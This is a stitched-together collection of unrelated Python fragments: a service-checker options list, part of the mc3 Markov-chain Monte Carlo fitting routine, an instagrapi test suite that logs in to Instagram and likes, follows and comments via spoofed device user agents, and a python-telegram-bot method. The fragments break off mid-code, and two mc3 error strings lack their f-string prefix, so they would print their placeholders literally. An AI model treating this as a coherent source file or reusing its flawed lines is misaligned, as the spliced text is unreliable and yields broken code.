Mandatory
* stringtosend -- String to send
Type: String
Default: None
* stringtoexpect -- String to expect in response
Type: String
Default: None
SMTP check options:
* port -- Target server port
Type: Integer
Default: 25
* auth -- Username and password for target SMTP authentication.
Example: user:password
Type: String
Default: None
* stringtoexpect -- String to expect in response
Type: | |
closelog = True
else:
closelog = False
if log is None:
log = mu.Log()
log.msg(
f"\n{log.sep}\n"
" Multi-core Markov-chain Monte Carlo (mc3).\n"
f" Version {__version__}.\n"
f" Copyright (c) 2015-{date.today().year} <NAME> "
"and collaborators.\n"
" mc3 is open-source software under the MIT license (see LICENSE).\n"
f"{log.sep}\n\n")
if sampler is None:
log.error("'sampler' is a required argument.")
if nsamples is None and sampler in ['mrw', 'demc', 'snooker']:
log.error("'nsamples' is a required argument for MCMC runs.")
if leastsq not in [None, 'lm', 'trf']:
log.error(
f"Invalid 'leastsq' input ({leastsq}). Must select from "
"['lm', 'trf'].")
# Read the model parameters:
params = mu.isfile(params, 'params', log, 'ascii', False, not_none=True)
# Unpack if necessary:
if np.ndim(params) > 1:
ninfo, ndata = np.shape(params)
if ninfo == 7: # The priors
prior = params[4]
priorlow = params[5]
priorup = params[6]
if ninfo >= 4: # The stepsize
pstep = params[3]
if ninfo >= 3: # The boundaries
pmin = params[1]
pmax = params[2]
else:
log.error('Invalid format/shape for params input file.')
params = params[0] # The initial guess
params = np.array(params)
# Process data and uncertainties:
data = mu.isfile(data, 'data', log, 'bin', False, not_none=True)
if np.ndim(data) > 1:
data, uncert = data
# Make local 'uncert' a copy, to avoid overwriting:
if uncert is None:
log.error("'uncert' is a required argument.")
uncert = np.copy(uncert)
# Process the independent parameters:
if indparams != []:
indparams = mu.isfile(indparams, 'indparams', log, 'bin', unpack=False)
if ioff:
plt.ioff()
resume = resume and (savefile is not None)
if resume:
log.msg(f"\n\n{log.sep}\n{log.sep} Resuming previous MCMC run.\n\n")
# Import the model function:
if isinstance(func, (list, tuple, np.ndarray)):
if len(func) == 3:
sys.path.append(func[2])
else:
sys.path.append(os.getcwd())
fmodule = importlib.import_module(func[1])
func = getattr(fmodule, func[0])
elif not callable(func):
log.error(
"'func' must be either a callable or an iterable of strings "
"with the model function, file, and path names.")
if ncpu is None and sampler in ['snooker', 'demc', 'mrw']:
ncpu = nchains
elif ncpu is None and sampler == 'dynesty':
ncpu = 1
# Cap the number of processors:
if ncpu >= mpr.cpu_count():
log.warning(
f"The number of requested CPUs ({ncpu}) is >= than the number "
f"of available CPUs ({mpr.cpu_count()}). "
f"Enforced ncpu to {mpr.cpu_count()-1}.")
ncpu = mpr.cpu_count() - 1
nparams = len(params)
ndata = len(data)
# Setup array of parameter names:
if pnames is None and texnames is not None:
pnames = texnames
elif pnames is not None and texnames is None:
texnames = pnames
elif pnames is None and texnames is None:
pnames = texnames = mu.default_parnames(nparams)
pnames = np.asarray(pnames)
texnames = np.asarray(texnames)
if pmin is None:
pmin = np.tile(-np.inf, nparams)
if pmax is None:
pmax = np.tile( np.inf, nparams)
pmin = np.asarray(pmin)
pmax = np.asarray(pmax)
if (np.any(np.isinf(pmin)) or np.any(np.isinf(pmax))) \
and sampler=='dynesty':
log.error('Parameter space must be constrained by pmin and pmax.')
if pstep is None:
pstep = 0.1 * np.abs(params)
pstep = np.asarray(pstep)
# Set prior parameter indices:
if prior is None or priorup is None or priorlow is None:
prior = priorup = priorlow = np.zeros(nparams)
# Override priors for non-free parameters:
priorlow[pstep<=0] = 0.0
priorup [pstep<=0] = 0.0
# Check that initial values lie within the boundaries:
if np.any(params < pmin) or np.any(params > pmax):
pout = ""
for pname, par, minp, maxp in zip(pnames, params, pmin, pmax):
if par < minp:
pout += "\n{pname[:11]:11s} {minp: 12.5e} < {par: 12.5e}"
if par > maxp:
pout += "\n{pname[:11]:26s} {par: 12.5e} > {maxp: 12.5e}"
log.error(
"Some initial-guess values are out of bounds:\n"
"Param name pmin value pmax\n"
"----------- ------------ ------------ ------------"
f"{pout}")
nfree = int(np.sum(pstep > 0))
ifree = np.where(pstep > 0)[0] # Free parameter indices
ishare = np.where(pstep < 0)[0] # Shared parameter indices
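The sign of pstep encodes each parameter's role, which the masks above rely on; a minimal illustration with values of our own choosing:

```python
import numpy as np

# pstep > 0:  free parameter (the value is the initial proposal step size)
# pstep == 0: fixed at its initial value
# pstep < 0:  shared, copying the parameter at index -int(pstep) - 1
pstep_demo = np.array([0.1, 0.0, -1.0, 0.05])

nfree_demo = int(np.sum(pstep_demo > 0))       # number of free parameters
ifree_demo = np.where(pstep_demo > 0)[0]       # indices of free parameters
ishare_demo = np.where(pstep_demo < 0)[0]      # indices of shared parameters
# Parameter 2 has pstep = -1, so it copies parameter -int(-1) - 1 = 0:
source_idx = -int(pstep_demo[ishare_demo[0]]) - 1
```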
# Check output dimension:
model0 = func(params, *indparams)
if np.shape(model0) != np.shape(data):
log.error(
f"The size of the data array ({np.size(data)}) does not "
f"match the size of the func() output ({np.size(model0)}).")
# Check that output path exists:
if savefile is not None:
fpath, fname = os.path.split(os.path.realpath(savefile))
if not os.path.exists(fpath):
log.warning(
f"Output folder path: '{fpath}' does not exist. "
"Creating new folder.")
os.makedirs(fpath)
# At the moment, skip optimization when these dynesty inputs exist:
if sampler == 'dynesty' \
and ('loglikelihood' in kwargs or 'prior_transform' in kwargs):
leastsq = None
# Least-squares minimization:
chisq_factor = 1.0
if leastsq is not None:
fit_output = fit(
data, uncert, func, np.copy(params), indparams,
pstep, pmin, pmax, prior, priorlow, priorup, leastsq)
fit_bestp = fit_output['bestp']
log.msg(
f"Least-squares best-fitting parameters:\n {fit_bestp}\n\n",
si=2)
# Scale data-uncertainties such that reduced chisq = 1:
if chisqscale:
chisq_factor = np.sqrt(fit_output['best_chisq']/(ndata-nfree))
uncert *= chisq_factor
# Re-calculate best-fitting parameters with new uncertainties:
fit_output = fit(
data, uncert, func, np.copy(params), indparams,
pstep, pmin, pmax, prior, priorlow, priorup, leastsq)
log.msg(
"Least-squares best-fitting parameters (rescaled chisq):"
f"\n {fit_output['bestp']}\n\n",
si=2)
params = np.copy(fit_output['bestp'])
else:
fit_output = None
if resume:
with np.load(savefile) as oldrun:
uncert *= float(oldrun['chisq_factor'])/chisq_factor
chisq_factor = float(oldrun['chisq_factor'])
# Here's where the magic happens:
if sampler in ['mrw', 'demc', 'snooker']:
output = mcmc(data, uncert, func, params, indparams, pmin, pmax, pstep,
prior, priorlow, priorup, nchains, ncpu, nsamples, sampler,
wlike, fit_output, grtest, grbreak, grnmin, burnin, thinning,
fgamma, fepsilon, hsize, kickoff, savefile, resume, log)
elif sampler == 'dynesty':
output = nested_sampling(data, uncert, func, params, indparams,
pmin, pmax, pstep, prior, priorlow, priorup, ncpu,
thinning, resume, log, **kwargs)
if leastsq is not None:
if (output['best_log_post'] - fit_output['best_log_post'] > 5.0e-8
and np.any((output['bestp'] - fit_output['bestp'])!=0.0)):
log.warning(
"MCMC found a better fit than the minimizer:\n"
"MCMC best-fitting parameters: (chisq={:.8g})\n{}\n"
"Minimizer best-fitting parameters: (chisq={:.8g})\n{}".
format(
-2*output['best_log_post'], output['bestp'],
-2*fit_output['best_log_post'], fit_output['bestp']))
else:
output['best_log_post'] = fit_output['best_log_post']
output['best_chisq'] = fit_output['best_chisq']
output['best_model'] = fit_output['best_model']
output['bestp'] = fit_output['bestp']
# And remove burn-in samples:
posterior, zchain, zmask = mu.burn(
Z=output['posterior'], zchain=output['zchain'], burnin=output['burnin'])
# Get some stats:
output['chisq_factor'] = chisq_factor
output['BIC'] = output['best_chisq'] + nfree*np.log(ndata)
if ndata > nfree:
output['red_chisq'] = output['best_chisq']/(ndata-nfree)
else:
output['red_chisq'] = np.nan
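A small numeric check of the statistics assembled above, with illustrative values (not from a real run):

```python
import numpy as np

best_chisq = 95.0   # illustrative best-fit chi-squared
ndata = 100         # number of data points
nfree = 3           # number of free parameters

# BIC = chi^2 + k*ln(N), matching output['BIC'] above:
bic = best_chisq + nfree * np.log(ndata)
# Reduced chi-squared, guarded against ndata <= nfree as above:
red_chisq = best_chisq / (ndata - nfree) if ndata > nfree else np.nan
```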
output['stddev_residuals'] = np.std(output['best_model']-data)
# Compute the credible region for each parameter:
bestp = output['bestp']
CRlo = np.zeros(nparams)
CRhi = np.zeros(nparams)
pdf = []
xpdf = []
for post, idx in zip(posterior.T, ifree):
PDF, Xpdf, HPDmin = ms.cred_region(post)
pdf.append(PDF)
xpdf.append(Xpdf)
CRlo[idx] = np.amin(Xpdf[PDF>HPDmin])
CRhi[idx] = np.amax(Xpdf[PDF>HPDmin])
# CR relative to the best-fitting value:
CRlo[ifree] -= bestp[ifree]
CRhi[ifree] -= bestp[ifree]
# Get the mean and standard deviation from the posterior:
meanp = np.zeros(nparams, np.double) # Parameters mean
stdp = np.zeros(nparams, np.double) # Parameter standard deviation
meanp[ifree] = np.mean(posterior, axis=0)
stdp [ifree] = np.std(posterior, axis=0)
for s in ishare:
bestp[s] = bestp[-int(pstep[s])-1]
meanp[s] = meanp[-int(pstep[s])-1]
stdp [s] = stdp [-int(pstep[s])-1]
CRlo [s] = CRlo [-int(pstep[s])-1]
CRhi [s] = CRhi [-int(pstep[s])-1]
output['CRlo'] = CRlo
output['CRhi'] = CRhi
output['stdp'] = stdp
output['meanp'] = meanp
output['ifree'] = ifree
output['pnames'] = pnames
output['texnames'] = texnames
log.msg(
"\nParam name Best fit Lo HPD CR Hi HPD CR Mean Std dev S/N"
"\n----------- ----------------------------------- ---------------------- ---------",
width=80)
for i in range(nparams):
snr = f"{np.abs(bestp[i])/stdp[i]:.1f}"
mean = f"{meanp[i]: 11.4e}"
lo = f"{CRlo[i]: 11.4e}"
hi = f"{CRhi[i]: 11.4e}"
if i in ifree: # Free-fitting value
pass
elif i in ishare: # Shared value
snr = f"[share{-int(pstep[i]):02d}]"
else: # Fixed value
snr = "[fixed]"
mean = f"{bestp[i]: 11.4e}"
log.msg(
f"{pnames[i][0:11]:<11s} {bestp[i]:11.4e} {lo:>11s} {hi:>11s} "
f"{mean:>11s} {stdp[i]:10.4e} {snr:>9s}",
width=160)
fmt = len(f"{output['BIC']:.4f}") # Length of string formatting
log.msg(" ")
if chisqscale:
log.msg(
"sqrt(reduced chi-squared) factor: {:{}.4f}".
format(output['chisq_factor'], fmt), indent=2)
log.msg("Best-parameter's chi-squared: {:{}.4f}".
format(output['best_chisq'], fmt), indent=2)
log.msg("Best-parameter's -2*log(posterior): {:{}.4f}".
format(-2*output['best_log_post'], fmt), indent=2)
log.msg("Bayesian Information Criterion: {:{}.4f}".
format(output['BIC'], fmt), indent=2)
log.msg("Reduced chi-squared: {:{}.4f}".
format(output['red_chisq'], fmt), indent=2)
log.msg("Standard deviation of residuals: {:.6g}\n".
format(output['stddev_residuals']), indent=2)
if savefile is not None or plots or closelog:
log.msg("\nOutput sampler files:")
# Save results (pop unpickables before saving, then put back):
if savefile is not None:
unpickables = ['dynesty_sampler']
unpickables = np.intersect1d(unpickables, list(output.keys()))
tmp_outputs = {key: output.pop(key) for key in unpickables}
np.savez(savefile, **output)
output.update(tmp_outputs)
log.msg(f"'{savefile}'", indent=2)
if plots:
# Extract filename from savefile or default to sampler:
fname = sampler if savefile is None else os.path.splitext(savefile)[0]
# Include bestp in posterior plots:
best_freepars = output['bestp'][ifree] | |
import json
import os
import os.path
import random
import unittest
from datetime import datetime
from json.decoder import JSONDecodeError
from pathlib import Path
from instagrapi import Client
from instagrapi.story import StoryBuilder
from instagrapi.types import (
Account,
Collection,
Comment,
DirectMessage,
DirectThread,
Hashtag,
Location,
Media,
MediaOembed,
Story,
StoryLink,
StoryLocation,
StoryMention,
StoryHashtag,
StorySticker,
User,
UserShort,
Usertag
)
from instagrapi.zones import UTC
from instagrapi.utils import generate_jazoest
ACCOUNT_USERNAME = os.environ.get("IG_USERNAME", "instagrapi2")
ACCOUNT_PASSWORD = os.environ.get("IG_PASSWORD", "<PASSWORD>")
ACCOUNT_SESSIONID = os.environ.get("IG_SESSIONID", "")
REQUIRED_MEDIA_FIELDS = [
"pk", "taken_at", "id", "media_type", "code", "thumbnail_url", "location",
"user", "comment_count", "like_count", "caption_text", "usertags",
"video_url", "view_count", "video_duration", "title"
]
REQUIRED_STORY_FIELDS = [
'pk', 'id', 'code', 'taken_at', 'media_type', 'product_type',
'thumbnail_url', 'user', 'video_url', 'video_duration', 'mentions',
'links'
]
def cleanup(*paths):
for path in paths:
try:
os.remove(path)
os.remove(f'{path}.jpg')
except FileNotFoundError:
continue
class BaseClientMixin:
def __init__(self, *args, **kwargs):
if self.api is None:
self.api = Client()
self.set_proxy_if_exists()
super().__init__(*args, **kwargs)
def set_proxy_if_exists(self):
proxy = os.environ.get("IG_PROXY", "")
if proxy:
self.api.set_proxy(proxy) # "socks5://127.0.0.1:30235"
return True
class FakeClientTestCase(BaseClientMixin, unittest.TestCase):
api = None
def test_login(self):
try:
self.api.login(ACCOUNT_USERNAME, "fakepassword")
except Exception as e:
self.assertEqual(
str(e), "The password you entered is incorrect. Please try again."
)
class ClientPrivateTestCase(BaseClientMixin, unittest.TestCase):
api = None
def __init__(self, *args, **kwargs):
filename = f'/tmp/instagrapi_tests_client_settings_{ACCOUNT_USERNAME}.json'
self.api = Client()
try:
settings = self.api.load_settings(filename)
except FileNotFoundError:
settings = {}
except JSONDecodeError as e:
print('JSONDecodeError when reading stored client settings; using empty settings.')
print(str(e))
settings = {}
self.api.set_settings(settings)
self.api.request_timeout = 1
self.set_proxy_if_exists()
if ACCOUNT_SESSIONID:
self.api.login_by_sessionid(ACCOUNT_SESSIONID)
else:
self.api.login(ACCOUNT_USERNAME, ACCOUNT_PASSWORD)
self.api.dump_settings(filename)
super().__init__(*args, **kwargs)
class ClientPublicTestCase(BaseClientMixin, unittest.TestCase):
api = None
def assertDict(self, obj, data):
for key, value in data.items():
if isinstance(value, str) and "..." in value:
self.assertTrue(value.replace("...", "") in obj[key])
elif isinstance(value, int):
self.assertTrue(obj[key] >= value)
else:
self.assertEqual(obj[key], value)
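The partial-match rules implemented by assertDict above can be exercised standalone; a sketch (the function name `dict_matches` is ours):

```python
def dict_matches(obj, expected):
    # Mirrors assertDict: a string containing "..." is a substring
    # pattern, an int is a lower bound (counts like likes only grow),
    # and any other value must match exactly.
    for key, value in expected.items():
        if isinstance(value, str) and "..." in value:
            if value.replace("...", "") not in obj[key]:
                return False
        elif isinstance(value, int):
            if obj[key] < value:
                return False
        elif obj[key] != value:
            return False
    return True

media = {'code': 'BVDOOolFFxg', 'like_count': 120,
         'thumbnail_url': 'https://cdn.example.org/x.jpg'}
```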
def test_media_info_gql(self):
media_pk = self.api.media_pk_from_url("https://www.instagram.com/p/BVDOOolFFxg/")
m = self.api.media_info_gql(media_pk)
self.assertIsInstance(m, Media)
media = {
'pk': 1532130876531694688,
'id': '1532130876531694688_1903424587',
'code': 'BVDOOolFFxg',
'taken_at': datetime(2017, 6, 7, 19, 37, 35, tzinfo=UTC()),
'media_type': 1,
'product_type': '',
'thumbnail_url': 'https://...',
'location': None,
'comment_count': 6,
'like_count': 79,
'has_liked': None,
'caption_text': '#creepy #creepyclothing',
'usertags': [],
'video_url': None,
'view_count': 0,
'video_duration': 0.0,
'title': '',
'resources': []
}
self.assertDict(m.dict(), media)
user = {
'pk': 1903424587,
'username': 'adw0rd',
'full_name': '<NAME>',
'profile_pic_url': 'https://...',
}
self.assertDict(m.user.dict(), user)
class ClientTestCase(unittest.TestCase):
def test_jazoest(self):
phone_id = "57d64c41-a916-3fa5-bd7a-3796c1dab122"
self.assertEqual(generate_jazoest(phone_id), "22413")
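The test above pins `generate_jazoest` to a known pair. The commonly documented scheme, which this sketch assumes instagrapi follows, prefixes `"2"` to the sum of the character codes of the phone id:

```python
def jazoest(phone_id: str) -> str:
    # Assumed scheme: '2' followed by the sum of the ASCII codes
    # of phone_id's characters.
    return "2" + str(sum(ord(c) for c in phone_id))
```

For the fixture above the character codes sum to 2413, giving `"22413"`.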
def test_lg(self):
settings = {
"uuids": {
"phone_id": "57d64c41-a916-3fa5-bd7a-3796c1dab122",
"uuid": "8aa373c6-f316-44d7-b49e-d74563f4a8f3",
"client_session_id": "6c296d0a-3534-4dce-b5aa-a6a6ab017443",
"advertising_id": "8dc88b76-dfbc-44dc-abbc-31a6f1d54b04",
"device_id": "android-e021b636049dc0e9"
},
"device_settings": {
"cpu": "h1",
"dpi": "640dpi",
"model": "h1",
"device": "RS988",
"resolution": "1440x2392",
"app_version": "172.16.31.10.123",
"manufacturer": "LGE/lge",
"version_code": "168361634",
"android_release": "6.0.1",
"android_version": 23
},
# "user_agent": "Instagram 172.16.31.10.123 Android (23/6.0.1; US; 168361634)"
"user_agent": "Instagram 172.16.58.3.119 Android (27/8.1.0; 480dpi; 1080x1776; motorola; Moto G (5S); montana; qcom; ru_RU; 253447809)"
}
api = Client(settings)
api.login(ACCOUNT_USERNAME, ACCOUNT_PASSWORD)
self.assertIsInstance(api.user_id, int)
self.assertEqual(api.username, ACCOUNT_USERNAME)
class ClientDeviceTestCase(ClientPrivateTestCase):
def test_set_device(self):
fields = ['uuids', 'cookies', 'last_login', 'device_settings', 'user_agent']
for field in fields:
settings = self.api.get_settings()
self.assertIn(field, settings)
device = {
"app_version": "172.16.17.32.119",
"android_version": 27,
"android_release": "8.1.0",
"dpi": "480dpi",
"resolution": "1080x1776",
"manufacturer": "motorola",
"device": "Moto G (5S)",
"model": "montana",
"cpu": "qcom",
"version_code": "253447809",
}
user_agent = "Instagram 165.1.0.29.119 Android (27/8.1.0; 480dpi; 1080x1776; motorola; Moto G (5S); montana; qcom; ru_RU; 253447809)"
self.api.set_device(device)
self.api.set_user_agent(user_agent)
settings = self.api.get_settings()
self.assertDictEqual(device, settings['device_settings'])
self.assertEqual(user_agent, settings['user_agent'])
self.api.user_info_by_username_v1('adw0rd')
request_user_agent = self.api.last_response.request.headers.get('User-Agent')
self.assertEqual(user_agent, request_user_agent)
class ClientUserTestCase(ClientPrivateTestCase):
def test_username_from_user_id(self):
self.assertEqual(self.api.username_from_user_id(1903424587), "adw0rd")
def test_user_medias(self):
user_id = self.api.user_id_from_username("adw0rd")
medias = self.api.user_medias(user_id, 20)
self.assertEqual(len(medias), 20)
media = medias[0]
self.assertIsInstance(media, Media)
for field in REQUIRED_MEDIA_FIELDS:
self.assertTrue(hasattr(media, field))
def test_user_followers(self):
user_id = self.api.user_id_from_username("asphalt_kings_lb")
followers = self.api.user_followers(self.api.user_id)
self.assertIn(user_id, followers)
self.assertEqual(followers[user_id].username, "asphalt_kings_lb")
def test_user_followers_amount(self):
user_id = self.api.user_id_from_username("adw0rd")
followers = self.api.user_followers(user_id, amount=10)
self.assertTrue(len(followers) == 10)
self.assertIsInstance(list(followers.values())[0], UserShort)
def test_user_following(self):
user_id = self.api.user_id_from_username("asphalt_kings_lb")
following = self.api.user_following(self.api.user_id)
self.assertIn(user_id, following)
self.assertEqual(following[user_id].username, "asphalt_kings_lb")
def test_user_following_amount(self):
user_id = self.api.user_id_from_username("adw0rd")
following = self.api.user_following(user_id, amount=10)
self.assertTrue(len(following) == 10)
self.assertIsInstance(list(following.values())[0], UserShort)
def test_user_follow_unfollow(self):
user_id = self.api.user_id_from_username("bmxtravel")
self.api.user_follow(user_id)
following = self.api.user_following(self.api.user_id)
self.assertIn(user_id, following)
self.api.user_unfollow(user_id)
following = self.api.user_following(self.api.user_id)
self.assertNotIn(user_id, following)
def test_user_info(self):
user_id = self.api.user_id_from_username("adw0rd")
user = self.api.user_info(user_id)
self.assertIsInstance(user, User)
for key, value in {
"biography": "Engineer: Python, JavaScript, Erlang...",
"external_url": "https://adw0rd.com/",
"full_name": "<NAME>",
"pk": 1903424587,
"is_private": False,
"is_verified": False,
"profile_pic_url": "https://...",
"username": "adw0rd",
}.items():
if isinstance(value, str) and "..." in value:
self.assertTrue(value.replace("...", "") in getattr(user, key))
else:
self.assertEqual(value, getattr(user, key))
def test_user_info_by_username(self):
user = self.api.user_info_by_username("adw0rd")
self.assertIsInstance(user, User)
self.assertEqual(user.pk, 1903424587)
self.assertEqual(user.full_name, "<NAME>")
self.assertFalse(user.is_private)
class ClientMediaTestCase(ClientPrivateTestCase):
def test_media_id(self):
self.assertEqual(
self.api.media_id(2154602296692269830), "2154602296692269830_1903424587"
)
def test_media_pk(self):
self.assertEqual(
self.api.media_pk("2154602296692269830_1903424587"), 2154602296692269830
)
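The two conversions exercised above are simple string operations: a media id is the media pk joined to the author's user pk with an underscore. A sketch (the real `Client.media_id` resolves the author itself; here the user pk is passed explicitly):

```python
def media_id(media_pk: int, user_pk: int) -> str:
    # "<media_pk>_<user_pk>", e.g. "2154602296692269830_1903424587"
    return f"{media_pk}_{user_pk}"


def media_pk(media_id: str) -> int:
    # The media pk is the part before the underscore.
    return int(media_id.split("_")[0])
```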
def test_media_pk_from_code(self):
self.assertEqual(
self.api.media_pk_from_code("B-fKL9qpeab"), 2278584739065882267
)
self.assertEqual(
self.api.media_pk_from_code("B8jnuB2HAbyc0q001y3F9CHRSoqEljK_dgkJjo0"),
2243811726252050162,
)
def test_media_pk_from_url(self):
self.assertEqual(
self.api.media_pk_from_url("https://instagram.com/p/B1LbfVPlwIA/"),
2110901750722920960,
)
self.assertEqual(
self.api.media_pk_from_url(
"https://www.instagram.com/p/B-fKL9qpeab/?igshid=1xm76zkq7o1im"
),
2278584739065882267,
)
def test_media_edit(self):
# Upload photo
media_pk = self.api.media_pk_from_url("https://www.instagram.com/p/BVDOOolFFxg/")
path = self.api.photo_download(media_pk)
self.assertIsInstance(path, Path)
try:
msg = "Test caption for photo"
media = self.api.photo_upload(path, msg)
self.assertIsInstance(media, Media)
self.assertEqual(media.caption_text, msg)
# Change caption
msg = "New caption %s" % random.randint(1, 100)
self.api.media_edit(media.pk, msg)
media = self.api.media_info(media.pk)
self.assertIsInstance(media, Media)
self.assertEqual(media.caption_text, msg)
self.assertTrue(self.api.media_delete(media.pk))
finally:
cleanup(path)
def test_media_edit_igtv(self):
media_pk = self.api.media_pk_from_url(
"https://www.instagram.com/tv/B91gKCcpnTk/"
)
path = self.api.igtv_download(media_pk)
self.assertIsInstance(path, Path)
try:
media = self.api.igtv_upload(path, "Test title", "Test caption for IGTV")
self.assertIsInstance(media, Media)
# Enter title
title = "Title %s" % random.randint(1, 100)
msg = "New caption %s" % random.randint(1, 100)
self.api.media_edit(media.pk, msg, title)
media = self.api.media_info(media.pk)
self.assertIsInstance(media, Media)
self.assertEqual(media.title, title)
self.assertEqual(media.caption_text, msg)
# Split caption to title and caption
title = "Title %s" % random.randint(1, 100)
msg = "New caption %s" % random.randint(1, 100)
self.api.media_edit(media.pk, f"{title}\n{msg}")
media = self.api.media_info(media.pk)
self.assertIsInstance(media, Media)
self.assertEqual(media.title, title)
self.assertEqual(media.caption_text, msg)
# Empty title (duplicate one-line caption)
msg = "New caption %s" % random.randint(1, 100)
self.api.media_edit(media.pk, msg, "")
media = self.api.media_info(media.pk)
self.assertIsInstance(media, Media)
self.assertEqual(media.title, msg)
self.assertEqual(media.caption_text, msg)
self.assertTrue(self.api.media_delete(media.id))
finally:
cleanup(path)
def test_media_user(self):
user = self.api.media_user(2154602296692269830)
self.assertIsInstance(user, UserShort)
for key, val in {
"pk": 1903424587,
"username": "adw0rd",
"full_name": "<NAME>",
}.items():
self.assertEqual(getattr(user, key), val)
self.assertTrue(user.profile_pic_url.startswith("https://"))
def test_media_oembed(self):
media_oembed = self.api.media_oembed(
"https://www.instagram.com/p/B3mr1-OlWMG/"
)
self.assertIsInstance(media_oembed, MediaOembed)
for key, val in {
"title": "В гостях у ДК @delai_krasivo_kaifui",
"author_name": "adw0rd",
"author_url": "https://www.instagram.com/adw0rd",
"author_id": 1903424587,
"media_id": "2154602296692269830_1903424587",
"width": 658,
"height": None,
"thumbnail_width": 640,
"thumbnail_height": 480,
"can_view": True,
}.items():
self.assertEqual(getattr(media_oembed, key), val)
self.assertTrue(media_oembed.thumbnail_url.startswith('http'))
def test_media_like_by_pk(self):
media_pk = self.api.media_pk_from_url(
"https://www.instagram.com/p/ByU3LAslgWY/"
)
self.assertTrue(
self.api.media_like(media_pk)
)
def test_media_like_and_unlike(self):
media_pk = self.api.media_pk_from_url(
"https://www.instagram.com/p/B3mr1-OlWMG/"
)
self.assertTrue(self.api.media_unlike(media_pk))
media = self.api.media_info_v1(media_pk)
like_count = int(media.like_count)
# like
self.assertTrue(self.api.media_like(media.id))
media = self.api.media_info_v1(media_pk) # refresh after like
new_like_count = int(media.like_count)
self.assertEqual(new_like_count, like_count + 1)
# unlike
self.assertTrue(self.api.media_unlike(media.id))
media = self.api.media_info_v1(media_pk) # refresh after unlike
self.assertEqual(media.like_count, like_count)
def test_media_likers(self):
media = self.api.user_medias(self.api.user_id, amount=3)[-1]
self.assertIsInstance(media, Media)
likers = self.api.media_likers(media.pk)
self.assertTrue(len(likers) > 0)
self.assertIsInstance(likers[0], UserShort)
class ClientCommentTestCase(ClientPrivateTestCase):
def test_media_comments(self):
comments = self.api.media_comments(2154602296692269830)
self.assertTrue(len(comments) > 5)
comment = comments[0]
self.assertIsInstance(comment, Comment)
comment_fields = comment.fields.keys()
user_fields = comment.user.fields.keys()
for field in [
"pk",
"text",
"created_at_utc",
"content_type",
"status",
"user"
]:
self.assertIn(field, comment_fields)
for field in [
"pk",
"username",
"full_name",
"profile_pic_url",
]:
self.assertIn(field, user_fields)
def test_media_comment(self):
text = "Test text [%s]" % int(datetime.now().timestamp())
now = datetime.now(tz=UTC())
comment = self.api.media_comment(2276404890775267248, text)
self.assertIsInstance(comment, Comment)
comment = comment.dict()
for key, val in {
"text": text,
"content_type": "comment",
"status": "Active"
}.items():
self.assertEqual(comment[key], val)
self.assertIn("pk", comment)
# The comment was written no more than 120 seconds ago
self.assertTrue(
abs((now - comment["created_at_utc"]).total_seconds()) <= 120
)
user_fields = comment['user'].keys()
for field in ["pk", "username", "full_name", "profile_pic_url"]:
self.assertIn(field, user_fields)
def test_comment_like_and_unlike(self):
media_pk = self.api.media_pk_from_url(
"https://www.instagram.com/p/B3mr1-OlWMG/"
)
comment = self.api.media_comments(media_pk)[0]
if comment.has_liked:
self.assertTrue(
self.api.comment_unlike(comment.pk)
)
like_count = int(comment.like_count)
# like
self.assertTrue(self.api.comment_like(comment.pk))
comment = self.api.media_comments(media_pk)[0]
new_like_count = int(comment.like_count)
self.assertEqual(new_like_count, like_count + 1)
# unlike
self.assertTrue(self.api.comment_unlike(comment.pk))
comment = self.api.media_comments(media_pk)[0]
self.assertEqual(comment.like_count, like_count)
class ClientCompareExtractTestCase(ClientPrivateTestCase):
def assertLocation(self, v1, gql):
if not isinstance(v1, dict):
return self.assertEqual(v1, gql)
for key, val in v1.items():
if key == 'external_id':
continue # id may differ
gql_val = gql[key]
if isinstance(val, float):
val, gql_val = round(val, 4), round(gql_val, 4)
self.assertEqual(val, gql_val)
def assertMedia(self, v1, gql):
self.assertTrue(v1.pop("comment_count") <= gql.pop("comment_count"))
self.assertLocation(v1.pop('location'), gql.pop('location'))
v1.pop('has_liked')
gql.pop('has_liked')
self.assertDictEqual(v1, gql)
def media_info(self, media_pk):
media_v1 = self.api.media_info_v1(media_pk)
self.assertIsInstance(media_v1, Media)
media_gql = self.api.media_info_gql(media_pk)
self.assertIsInstance(media_gql, Media)
return media_v1.dict(), media_gql.dict()
def test_two_extract_media_photo(self):
media_v1, media_gql = self.media_info(
self.api.media_pk_from_code('B3mr1-OlWMG')
)
self.assertTrue(media_v1.pop("thumbnail_url").startswith("https://"))
self.assertTrue(media_gql.pop("thumbnail_url").startswith("https://"))
self.assertMedia(media_v1, media_gql)
def test_two_extract_media_video(self):
media_v1, media_gql = self.media_info(
self.api.media_pk_from_code('B3rFQPblq40')
)
self.assertTrue(media_v1.pop("video_url").startswith("https://"))
self.assertTrue(media_gql.pop("video_url").startswith("https://"))
self.assertTrue(media_v1.pop("thumbnail_url").startswith("https://"))
self.assertTrue(media_gql.pop("thumbnail_url").startswith("https://"))
self.assertMedia(media_v1, media_gql)
def test_two_extract_media_album(self):
media_v1, media_gql = self.media_info(
self.api.media_pk_from_code('BjNLpA1AhXM')
)
for res in media_v1['resources']:
self.assertTrue(res.pop("thumbnail_url").startswith("https://"))
if res['media_type'] == 2:
self.assertTrue(res.pop("video_url").startswith("https://"))
for res in media_gql['resources']:
self.assertTrue(res.pop("thumbnail_url").startswith("https://"))
if res['media_type'] == 2:
self.assertTrue(res.pop("video_url").startswith("https://"))
self.assertMedia(media_v1, media_gql)
def test_two_extract_media_igtv(self):
media_v1, media_gql = self.media_info(
self.api.media_pk_from_code('ByYn5ZNlHWf')
)
self.assertTrue(media_v1.pop("video_url").startswith("https://"))
self.assertTrue(media_gql.pop("video_url").startswith("https://"))
self.assertTrue(media_v1.pop("thumbnail_url").startswith("https://"))
self.assertTrue(media_gql.pop("thumbnail_url").startswith("https://"))
self.assertMedia(media_v1, media_gql)
def test_two_extract_user(self):
user_v1 = self.api.user_info_v1(1903424587)
user_gql = self.api.user_info_gql(1903424587)
self.assertIsInstance(user_v1, User)
self.assertIsInstance(user_gql, User)
user_v1, user_gql = user_v1.dict(), user_gql.dict()
self.assertTrue(user_v1.pop("profile_pic_url").startswith("https://"))
self.assertTrue(user_gql.pop("profile_pic_url").startswith("https://"))
self.assertDictEqual(user_v1, | |
is returned.
Raises:
:class:`telegram.TelegramError`
"""
if inline_message_id is None and (chat_id is None or message_id is None):
raise TelegramError(
'editMessageReplyMarkup: Both chat_id and message_id are required when '
'inline_message_id is not specified')
url = '{0}/editMessageReplyMarkup'.format(self.base_url)
data = {}
if chat_id:
data['chat_id'] = chat_id
if message_id:
data['message_id'] = message_id
if inline_message_id:
data['inline_message_id'] = inline_message_id
return url, data
@log
def get_updates(self,
offset=None,
